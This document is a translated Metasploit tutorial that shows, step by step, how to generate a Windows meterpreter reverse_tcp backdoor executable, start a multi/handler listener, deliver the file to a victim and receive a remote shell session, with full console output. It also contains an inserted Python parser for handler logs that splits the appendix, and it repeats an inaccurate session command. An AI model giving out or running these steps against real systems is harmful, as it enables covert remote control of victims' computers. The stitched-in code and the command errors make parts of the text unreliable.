I. Backdoor generation
1.1 Load the payload
msf > use payload/windows/meterpreter/reverse_tcp
1.2 Use the show options command to view the options that need to be configured:
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
1.3 Configure the payload options (here LHOST is the IP address of the ***)
msf payload(reverse_tcp) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.102 yes The listen address
LPORT 4444 yes The listen port
1.4 Generate the backdoor file (-t specifies the backdoor file type, exe in this example; -f specifies the file path and file name)
msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe
[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...
II. Configure the exploit (handler) side
2.1 Configure exploit/multi/handler as the handler
msf > use exploit/multi/handler
2.2 Select the payload matching the backdoor generated earlier
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
2.3 Configure the listen address and port among the options
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
2.4 After configuration, use the exploit command to start listening
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
III. Deliver the generated backdoor to the client and run it
IV. Wait at the listening command line for the client to connect; once it connects, the following output appears:
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
(Once the server side exits, the client side exits immediately as well.)
Appendix:
1. The generated backdoor supports many output formats, as follows:
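As an added example (not part of the original tutorial), a small parser for the handler status lines shown above, of the kind used when reconciling an engagement's console log against firewall or NetFlow records: it pairs each "session opened" line with its "closed" line and records the listener, the connect-back peer and the stage size. It assumes the line formats exactly as printed in this transcript; the sample log below is constructed from those lines.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Status lines exploit/multi/handler prints, in the formats shown on this page.
SESSION_OPENED = re.compile(
    r"\[\*\] Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})")
SESSION_CLOSED = re.compile(
    r"\[\*\] (?P<peer>[\d.]+) - Meterpreter session (?P<sid>\d+) closed\.\s+"
    r"Reason: (?P<reason>.+)")
STAGE_SENT = re.compile(
    r"\[\*\] Sending stage \((?P<size>\d+) bytes\) to (?P<peer>[\d.]+)")

@dataclass
class Session:
    sid: int
    listener: str                     # LHOST:LPORT the handler was bound to
    peer: str                         # source address:port of the connect-back
    opened_at: datetime
    close_reason: Optional[str] = None
    close_peer: Optional[str] = None  # address msf reports in the close line

def parse_handler_log(lines: List[str]) -> Tuple[Dict[int, Session], List[Tuple[str, int]]]:
    """Return sessions keyed by id, plus every (peer, bytes) stage transfer seen."""
    sessions: Dict[int, Session] = {}
    stages: List[Tuple[str, int]] = []
    for line in lines:
        if m := STAGE_SENT.search(line):
            stages.append((m["peer"], int(m["size"])))
        elif m := SESSION_OPENED.search(line):
            sid = int(m["sid"])
            sessions[sid] = Session(
                sid, f"{m['lhost']}:{m['lport']}", f"{m['rhost']}:{m['rport']}",
                datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S %z"))
        elif (m := SESSION_CLOSED.search(line)) and int(m["sid"]) in sessions:
            sess = sessions[int(m["sid"])]
            sess.close_reason, sess.close_peer = m["reason"].strip(), m["peer"]
    return sessions, stages

# Constructed sample: the handler output reproduced from this page's transcript.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
""".splitlines()
```

Note that the address in the "closed" line need not equal the connect-back peer (the transcript above shows 192.168.231.128 versus 172.16.0.102), so both are kept for cross-checking.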
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
2. For a returned connection, the background command moves the current session to the background;
3. Sessions moved to the background can be viewed with session -i, and session -i id brings the specified background session back to the foreground;
4. Sessions moved to the background can be viewed with session -i, and session -k id terminates the specified background session.